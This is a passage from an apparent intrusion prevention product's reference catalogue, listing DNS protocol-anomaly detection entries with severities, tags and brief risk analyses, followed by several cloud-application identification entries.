Description: DNS message was sent to a wrong direction: a DNS response was seen in a TCP client stream. This situation can occur in DNS data over TCP transport. Risk analysis: This is an abnormal situation that may indicate non-DNS protocol data.
Back to top

DNS_Client-Type-Nonquery

About this situation: Non-query TYPE code encountered in Questions section of DNS message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Non-query TYPE code was encountered in the Questions section of the DNS message. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This may represent some kind of attack against defective DNS protocol implementations. Alternatively, this may indicate non-DNS protocol data.
Back to top

DNS_Client-Type-Query-Only

About this situation: DNS message contained query-only type value in Answer section
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS message contained a query-only type value in the Answer section. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol.
Back to top

DNS_Client-Type-Unknown

About this situation: Unknown type field value detected in DNS message's Question or Answer section
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown type field value was detected in a DNS message's Question or Answer section. The unknown value is either reserved or not specified in the RFCs. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This situation may result from non-DNS protocol data.
Back to top

DNS_Client-UDP-Extra-Data

About this situation: Extra data detected in UDP datagram after DNS message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Extra data was detected in the UDP datagram after the DNS message. This situation can occur in DNS data over UDP transport. Risk analysis: This violates the DNS protocol. The extra data may potentially be some attack-related data, such as shellcode.
Back to top

DNS_Client-UDP-Payload-By-OPT

About this situation: The UDP payload advertised in the OPT field DNS extension exceeds the defined limit.
Context: DNS Client UDP Payload By OPT Limit
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: The UDP payload advertised in the OPT field DNS extension exceeds the defined limit. This situation can occur in DNS data over UDP transport. Risk analysis: This does not violate the DNS protocol. The advertised UDP payload value in the OPT fields is considered abnormally large and may possibly be related to some kind of attack.
Back to top

DNS_Client-UDP-Payload-Length

About this situation: The UDP payload of the DNS message exceeded the defined limit.
Context: DNS Client UDP Payload Limit
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The UDP payload of the DNS message exceeded the defined limit. This situation can occur in DNS data over UDP transport. Risk analysis: This does not violate the DNS protocol, as the DNS extensions allow using UDP payloads longer than 512 bytes. The DNS message UDP payload is considered abnormally large and may possibly be related to some kind of attack.
Back to top

DNS_Client-UDP-QR-Wrong-Direction

About this situation: DNS message sent in wrong direction: DNS response seen in UDP client message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: DNS message was sent to a wrong direction: a DNS response was seen in a UDP client message. This situation can occur in DNS data over UDP transport. Risk analysis: This is an abnormal situation that may indicate non-DNS protocol data.
Back to top

DNS_DDNS_update

About this situation: Dynamic DNS update
Context: DNS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Description: Client is trying to send a dynamic update to a dns server.
Back to top

DNS_Dynamic_DNS_Violation

About this situation: Dynamic DNS violation
Context: DNS without parameters
Severity: 4
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Description: Dynamic DNS update was tried but blocked according to policy.
Back to top

DNS_IQUERY-Reply-Failure

About this situation: Failure response to DNS request with inverse query (IQUERY) Opcode detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A failure response to a DNS request with the inverse query (IQUERY) Opcode was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not follow the recommendation in [RFC 3425], which makes the IQUERY Opcode obsolete. The IQUERY can be used in denial of service attacks by exhausting the server processing resources or network bandwidth.
Back to top

DNS_IQUERY-Reply-Success

About this situation: DNS message with inverse query (IQUERY) got success response
Context: DNS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A success response to a DNS request with the inverse query (IQUERY) Opcode was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not follow the recommendation in [RFC 3425], which makes the IQUERY Opcode obsolete. The IQUERY can be used in denial of service attacks by exhausting the server processing resources or network bandwidth. This situation involves a success response from the server, indicating that the server accepted IQUERY and may be vulnerable to a denial of service attack.
Back to top

DNS_IQUERY-Request

About this situation: DNS message with inverse query (IQUERY) Opcode detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A DNS request with the inverse query (IQUERY) Opcode was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not follow the recommendation in [RFC 3425], which makes the IQUERY Opcode obsolete. The IQUERY can be used in denial of service attacks by exhausting the server processing resources or network bandwidth.
Back to top

DNS_ISC-BIND-Empty-RSA-Modulus

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1390-5242
Last changed: sgpkg-ips-1390-5242
Vulnerability: ISC-BIND-Invalid-DNS-Key-Record
Description:
Back to top

DNS_Message-Parser

About this situation: Parser support for DNS messages
Context: ANY Common Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1390-5242
Last changed: sgpkg-ips-1390-5242
Description:
Back to top

DNS_NOTIFY-Reply-Failure

About this situation: Failure response to DNS NOTIFY request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-218-3038
Description: A failure response to a DNS NOTIFY request was detected. The message causing this event is a DNS response. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol.
Back to top

DNS_NOTIFY-Reply-Success

About this situation: Server success reply to DNS NOTIFY request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-218-3038
Description: A server success reply to a DNS NOTIFY request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol.
Back to top

DNS_NOTIFY-Request

About this situation: DNS NOTIFY request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-218-3038
Description: A DNS NOTIFY request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol.
Back to top

DNS_Protocol_Violation

About this situation: DNS protocol violation
Context: DNS without parameters
Severity: 4
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Vulnerability: Tftpd32-DNS-Server-Buffer-Overflow
Description: DNS traffic does not conform to standards, and is blocked according to policy.
Back to top

DNS_Question-Processed

About this situation: The DNS question was processed successfully.
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1581-5242
Description: The question in the DNS request's question section was processed. DNS host lists were matched for this query.
Back to top

DNS_Record-Address-Logged

About this situation: A DNS address resource record was logged.
Context: DNS without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: A DNS address resource record was logged. Risk analysis: Risk level is none. This is an informative message.
Back to top

DNS_Recursion-Recursion-Available

About this situation: Recursion Available (RA) flag detected in DNS QUERY reply
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A Recursion Available (RA) flag was detected in a DNS QUERY reply. (If the message is a success reply, and the corresponding inspection check is enabled, the "DNS_Recursion-Reply-Success" situation is generated instead.) This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. For security or other reasons, a name server can be configured as non-recursive. In this case, the server does not support recursive queries, and thus the Recursion Available flag should not be enabled in these replies. It is possible that the name server also restricts the recursion for a subset of clients.
Back to top

DNS_Recursion-Recursion-Desired

About this situation: Recursion Desired (RD) flag detected in DNS QUERY request
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A Recursion Desired (RD) flag was detected in a DNS QUERY request. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. This situation occurs when the Recursion Desired flag is set in the client request. Usually, DNS clients do not use the Recursion Desired flag. A name server can be configured as non-recursive for security or other reasons. It is possible that the name server also restricts the recursion for a subset of clients.
Back to top

DNS_Recursion-Reply-Success

About this situation: Server success reply to recursive DNS QUERY request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A server success reply to a recursive DNS QUERY request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. This situation indicates that the server responded to a recursive query. A name server can be configured as non-recursive for security or other reasons. It is possible that the name server also restricts the recursion for a subset of clients.
Back to top

DNS_Reply_Modified

About this situation: DNS server reply was modified according to the policy
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-656-5211
Description: A server reply to a DNS query was detected. The cause of this event was that the DNS response was modified according to the firewall policy. This situation can occur in DNS data over TCP and UDP transport. This situation indicates that the DNS reply was modified according to the policy. This is usually the case when e.g. Google Safesearch is enforced in the network.
Back to top

DNS_Server-Class-Query-Only

About this situation: DNS message with QUERY or IQUERY Opcode contained query-only class value ANY in Answer section Resource Record
Context: DNS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: A DNS message with a QUERY or IQUERY Opcode contained a query-only class value ANY in an Answer section Resource Record. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: Low
Back to top

DNS_Server-Class-Unknown

About this situation: Unknown class field value detected in DNS message's Question or Answer section
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown class field value was detected in a DNS message's Question or Answer section. The unknown value is either reserved or not specified in the RFCs. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This situation may result from non-DNS protocol data.
Back to top

DNS_Server-Header-Z-Nonzero

About this situation: Reserved Z field in DNS message header was non-zero
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The reserved Z field in the DNS message header was non-zero. According to the standard, the Z field must be zero. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This situation may result from non-DNS protocol data.
Back to top

DNS_Server-Hostname-Length

About this situation: The DNS name field that was inspected as a host name exceeded the hostname length limit specified.
Context: DNS Server Hostname Length Limit
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS name field that was inspected as a hostname exceeded the hostname length limit specified. Hostnames are in the name field of A and MX records and in the data fields of SOA and NS records. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: Risk level is low. This does not violate the DNS protocol. This violates the defined limit in the policy. Long host names may be a buffer overflow attack against some defective DNS protocol implementations.
Back to top

DNS_Server-Hostname-Syntax-Incorrect

About this situation: DNS name inspected as host name did not conform to host name syntax specified by [RFC 952]
Context: DNS without parameters
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS name inspected as a host name did not conform to the host name syntax specified by [RFC 952]. Host names are in the name field of A and MX records and in the data fields of SOA and NS records. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. The situation is considered abnormal and may possibly be related to some kind of attack.
Back to top

DNS_Server-Name-Bad-Label-Type

About this situation: Unknown DNS name label type encountered in DNS message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown DNS name label type was encountered in a DNS message. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS name syntax specified by the DNS protocol. The datagram may contain something else than DNS protocol data. Alternatively, this may represent some kind of attack against a defective DNS protocol implementation.
Back to top

DNS_Server-Name-Bad-Pointer-Version-2

About this situation: Invalid name compression pointer value encountered in DNS name
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-265-3038
Last changed: sgpkg-ips-265-3038
Description: An invalid name compression pointer value was encountered in a DNS name. The pointer was referring to a location containing no name label or pointer, or the pointer was illegally referring to an offset greater than the pointer itself. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This may represent some kind of attack against a defective DNS protocol implementation.
Back to top

DNS_Server-Name-Length

About this situation: The DNS name field exceeded 100 bytes.
Context: DNS Server Name Length Limit
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS name field exceeded the length limit specified in the policy. The "DNS name length" log field shows the detected value. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. This violates the defined limit in the policy. Long names may be a buffer overflow attack against some defective DNS protocol implementations.
Back to top

DNS_Server-Name-Syntax-Incorrect

About this situation: DNS name violates printable-ASCII syntax
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The DNS name violates the printable-ASCII syntax. If this name is a host name, the host name syntax is also violated. (There is no separate notification of violation of the host name syntax when this situation occurs.) This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. The situation is considered abnormal for this environment and may possibly be related to some kind of attack.
Back to top

DNS_Server-Name-Too-Long

About this situation: Total length of DNS name with all pointer and length fields was greater than 255
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The total length of a DNS name with all the pointer and the length fields was greater than 255. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This may be a buffer overflow attack against some defective DNS protocol implementations.
Back to top

DNS_Server-Opcode-Unknown

About this situation: Unknown Ocode value detected in DNS message's header
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown Opcode value was detected in a DNS message's header. The unknown value is either reserved or not specified in the RFCs. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This situation may result from non-DNS protocol data.
Back to top

DNS_Server-Premature-End

About this situation: DNS message ended prematurely as transport layer datagram or stream ended
Context: DNS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: The DNS message ended prematurely as the transport layer datagram or stream ended. This may also occur when the DNS message was completely missing. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This situation may result from non-DNS protocol data.
Back to top

DNS_Server-QDCOUNT-Not-1

About this situation: DNS message with QUERY Opcode contained QDCOUNT field value that was not 1
Context: DNS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A DNS message with the QUERY Opcode contained a QDCOUNT field value that was not 1. The event is not generated in normal operation where QDCOUNT is zero and RCODE is non-zero. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: Usually, DNS QUERY messages contain one question. Sometimes (e.g. in case of error or zone transfer) the reply message does not contain questions at all. This situation may result from non-DNS protocol data. It may indicate that the requestor is attempting some kind of buffer overflow attack.
Back to top

DNS_Server-Question-Logged

About this situation: A DNS server question record was logged.
Context: DNS without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: A DNS server's question record was logged. Risk analysis: Risk level is none. This is an informative message.
Back to top

DNS_Server-RCODE-Unknown

About this situation: DNS unknown RCODE value seen
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown return code value was detected in a DNS message's header. The unknown value is either reserved or not specified in the RFCs. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This situation may result from non-DNS protocol data.
Back to top

DNS_Server-Resource-Record-Extra-Data

About this situation: Resource Record contents shorter than indicated in RDLEN field
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The Resource Record contents were shorter than indicated in the RDLEN field. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol.
Back to top

DNS_Server-Resource-Record-Over-Length

About this situation: Resource Record contents longer than indicated in RDLEN field
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The Resource Record contents were longer than indicated in the RDLEN field. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This could be caused by non-DNS protocol data or by some kind of attack against a defective DNS protocol implementation.
Back to top

DNS_Server-TCP-Extra-Data

About this situation: DNS message shorter than indicated in TCP LENGTH prefix field of message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS message was shorter than indicated in the TCP LENGTH prefix field of the message. This situation can occur in DNS data over TCP transport. Risk analysis: This violates the DNS protocol. The extra data may potentially contain some attack-related data, such as shellcode.
Back to top

DNS_Server-TCP-Over-Length

About this situation: DNS message longer than indicated in TCP LENGTH prefix field of message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS message was longer than indicated in the TCP LENGTH prefix field of the message. This situation can occur in DNS data over TCP transport. Risk analysis: This violates the DNS protocol.
Back to top

DNS_Server-TCP-QR-Wrong-Direction

About this situation: DNS message sent in wrong direction: DNS request seen in TCP server stream
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: DNS message was sent to a wrong direction: a DNS request was seen in a TCP server stream. This situation can occur in DNS data over TCP transport. Risk analysis: This is an abnormal situation that may indicate non-DNS protocol data.
Back to top

DNS_Server-Type-Nonquery

About this situation: Non-query TYPE code encountered in Questions section of DNS message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Non-query TYPE code was encountered in the Questions section of the DNS message. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This may represent some kind of attack against defective DNS protocol implementations. Alternatively, this may indicate non-DNS protocol data.
Back to top

DNS_Server-Type-Query-Only

About this situation: DNS message contained query-only type value in Answer section
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A DNS message contained a query-only type value in the Answer section. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol.
Back to top

DNS_Server-Type-Unknown

About this situation: Unknown type field value detected in DNS message's Question or Answer section
Context: DNS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An unknown type field value was detected in a DNS message's Question or Answer section. The unknown value is either reserved or not specified in the RFCs. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This situation may result from non-DNS protocol data.
Back to top

DNS_Server-UDP-Extra-Data

About this situation: Extra data detected in UDP datagram after DNS message
Context: DNS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-241-3038
Description: Extra data was detected in the UDP datagram after the DNS message. This situation can occur in DNS data over UDP transport. Risk analysis: This violates the DNS protocol. The extra data may potentially be some attack-related data, such as shellcode.
Back to top

DNS_Server-UDP-Payload-By-OPT

About this situation: The UDP payload advertised in the OPT field DNS extension exceeds the defined limit.
Context: DNS Server UDP Payload By OPT Limit
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-336-4219
Description: The UDP payload advertised in the OPT field DNS extension exceeds the defined limit. This situation can occur in DNS data over UDP transport. Risk analysis: This does not violate the DNS protocol. The advertised UDP payload value in the OPT fields is considered abnormally large and may possibly be related to some kind of attack.
Back to top

DNS_Server-UDP-Payload-Length

About this situation: The UDP payload of the DNS message exceeded the defined limit.
Context: DNS Server UDP Payload Limit
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The UDP payload of the DNS message exceeded the defined limit. This situation can occur in DNS data over UDP transport. Risk analysis: This does not violate the DNS protocol, as the DNS extensions allow using UDP payloads longer than 512 bytes. The DNS message UDP payload is considered abnormally large and may possibly be related to some kind of attack.
Back to top

DNS_Server-UDP-QR-Wrong-Direction

About this situation: DNS message sent in wrong direction: DNS request seen in UDP server message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: DNS message was sent to a wrong direction: a DNS request was seen in a UDP server message. This situation can occur in DNS data over UDP transport. Risk analysis: This is an abnormal situation that may indicate non-DNS protocol data.
Back to top

DNS_Standard-Query-Reply-Failure

About this situation: Failure reply to standard DNS query detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A failure reply to a standard DNS query request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. This situation indicates that the server responded to a standard DNS query with a failure reply.
Back to top

DNS_Standard-Query-Reply-Success

About this situation: Success reply to DNS standard query request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A success reply to a DNS standard query request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. This situation indicates that the server responded to a standard DNS query.
Back to top

DNS_Standard-Query-Request

About this situation: Standard DNS query detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A standard DNS query request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol.
Back to top

DNS_Transaction-State-Limit-Exceeded

About this situation: The DNS transaction state limit was exceeded.
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1595-5242
Description: The DNS module stores state for question/answer pairs in a connection. This situation is triggered, when the per connection limit for concurrent states is exceeded.
Back to top

DNS_Transfer-Reply-Failure

About this situation: Failure reply to a DNS zone transfer request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-463-5211
Description: A failure reply to a DNS zone transfer request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. A successful DNS zone transfer may disclose sensitive information to an attacker.
Back to top

DNS_Transfer-Reply-Success

About this situation: Server reply to a DNS zone transfer request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-427-4219
Description: A server reply to a DNS zone transfer request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. The success reply from the server indicates a successful zone transfer. A successful DNS zone transfer may disclose sensitive information to the attacker.
Back to top

DNS_Transfer-Request

About this situation: DNS zone transfer request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-463-5211
Vulnerability: DNS-Zone-Transfer
Description: A DNS zone transfer request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. A successful DNS zone transfer may disclose sensitive information to an attacker.
Back to top

DNS_Update-Reply-Failure

About this situation: Failure reply to a DNS dynamic update request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A failure reply to a DNS dynamic update request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. If the "DNS hdr qdcount" field has the value 1 and the number of records to be updated in the "DNS hdr nscount" field is zero, the security risk was potentially only in information disclosure. If the "DNS hdr nscount" is greater than zero, it could have been an attempt to update some Resource Records on the DNS server. If the DNS message is a reply and the "DNS hdr qdcount" has the value zero, the reply did not contain the requested information.
Back to top

DNS_Update-Reply-Success

About this situation: Server reply to a DNS dynamic update request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A server reply to a DNS dynamic update request was detected. The message causing this event was a reply to a DNS update request sent by "IP destination". This situation can occur in DNS data over TCP and UDP transport. This situation has been known to occur when DHCP clients register their names to a DNS server. If this is the case, the suggested solution is to disable this situation for the target server and the client network. Risk analysis: This does not violate the DNS protocol. If the "DNS hdr qdcount" field has the value 1 and the number of records to be updated in the "DNS hdr nscount" field is zero, the security risk was potentially only in information disclosure. If the "DNS hdr nscount" is greater than zero, it could have been an attempt to update some Resource Records on the DNS server. If the "DNS hdr qdcount" is zero in the DNS reply message, the reply did not contain the requested information.
Back to top

DNS_Update-Request

About this situation: DNS dynamic update request detected
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: A DNS dynamic update request was detected. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. If the "DNS hdr qdcount" field has the value 1 and the number of records to be updated in the "DNS hdr nscount" field is zero, the security risk was potentially only in information disclosure. If the "DNS hdr nscount" is greater than zero, it could have been an attempt to update some Resource Records on the DNS server. If the DNS message is a reply and the "DNS hdr qdcount" has the value zero, the reply did not contain the requested information.
Back to top

DNS_Zone_Transfer_Violation

About this situation: DNS zone transfer violation
Context: DNS without parameters
Severity: 4
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Description: DNS zone transfer was attempted, but blocked according to policy.
Back to top

DNV-GL

About this situation: Application DNV-GL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DNV GL enables organizations to advance the safety and sustainability of their business. We provide classification and technical assurance along with software and independent expert advisory services to the maritime, oil and gas, and energy industries.
Back to top

Do.com

About this situation: Do.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Manage tasks, contacts, notes and projects with your team. Get started for free on mobile or web.
Back to top

Doba

About this situation: Application Doba detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Doba is a commerce platform serving suppliers and buyers, provides a marketplace that connects suppliers and retailers by automating the e-commerce supply chain through virtual inventory management and direct merchandise fulfillment.
Back to top

DocandDo

About this situation: Application DocandDo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DocAndDo helps run your business effectively. Keep track of Business Processes, Employee Training, Company Policies, Files. Instantly contact Employees, Vendors, Clients, JV Partners, Affiliate Partners.
Back to top

Doccle

About this situation: Application Doccle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Doccle is a foundation for the online platform that various partners
Back to top

Docebo

About this situation: Application Docebo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Docebo is a Cloud E-Learning solutions provider that is working on the online training market with its Software as a Service Learning Management System.
Back to top

Docker

About this situation: Application Docker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Docker is an open platform for developers and sysadmins to build, ship, and run distributed applications, whether on laptops, data center VMs, or the cloud.
Back to top

DOCKMAN-container-failed

About this situation: A container has failed to start
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
